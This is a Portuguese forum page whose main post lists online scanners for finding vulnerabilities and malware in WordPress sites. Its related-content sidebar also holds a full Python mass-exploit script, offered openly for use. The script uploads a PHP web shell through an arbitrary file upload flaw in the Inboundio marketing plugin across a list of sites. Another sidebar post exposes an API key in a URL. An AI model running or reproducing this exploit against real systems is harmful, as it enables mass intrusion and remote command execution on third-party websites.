Jump to content
Sign in to follow this  
Flayner

WORDPRESS - Scan vulnerabilidades e malwares

Recommended Posts

dima-sxema2.png.14dec93a616c73e460afb3f7e96093c3.png

Quando você cria seu site ou blog usando o WORDPRESS , é preciso ter todo um cuidado com a seguraça precisamos verificar

 possível existência de vulnerabilidades e malwares.Essas ameaças podem ser verificadas com ferramentas on-line.

Deixo algumas dessa ferramentas ;

 

Webinspector

001.jpg.ad1015fa9f876d756d6a27e8fe01506e.jpg

 

Wprecon

002.jpg.899d29cfb26d459237cde70655bd0dba.jpg

 

Scanurl

003.jpg.7ef294f1cbe264b0214a4be411e81e80.jpg

 

Url void

004.jpg.250d5fc5a929b590fa26241b6feda593.jpg

 

Up guard

005.jpg.e44050eb2b741ca1b1c0d5c7df7a750b.jpg

 

Wpscans

006.jpg.c40928d77d674f1a844804c01aaabc14.jpg

 

Wordpress security scanner

007.jpg.2f87e4d31709a45ef3df2b4ac7d00e0e.jpg

 

Wordpress security scan

008.jpg.6478b6860f4a49656f63475085e57d4c.jpg

 

 

 

 

Edited by Flayner
editar

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  



  • Similar Content

    • By Rafael Cintra
      É com muita alegria que apresento meu ebook Segurança no Wordpress. 🔒🌐   Neste ebook você vai aprender a como proteger um site em Wordpress.   👇 Baixe o ebook gratuitamente!   Obrigado e boa leitura! 📘😎   https://rafaelcintralopes.com.br/ebook-gratuito-seguranca-no-wordpress/
    • By Exu_mirim
      To me aventurando a construindo um site no wordpress de um comunidade de um jogo para android. Só que eu  gostaria de fazer um requests das informações dos jogadores com API do servidor  (https://www.liveflightapp.com/api/v3/user?userId=0b8deda7-c7ed-49b1-9d3f-9f614422484e&key=e6dc0d72-bbbe-4037-8f99-408efb644dca)  
      queria saber qual liguagem deveria usar e que devo procura para poder fazer essa estrutura para busca informação de outro site.
      tendo em vista que sou totalmentee leigo em php e javascript, só tendo conhecimento em python. 

       

    • By FaceOs
      Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária.
       
      #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)  
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.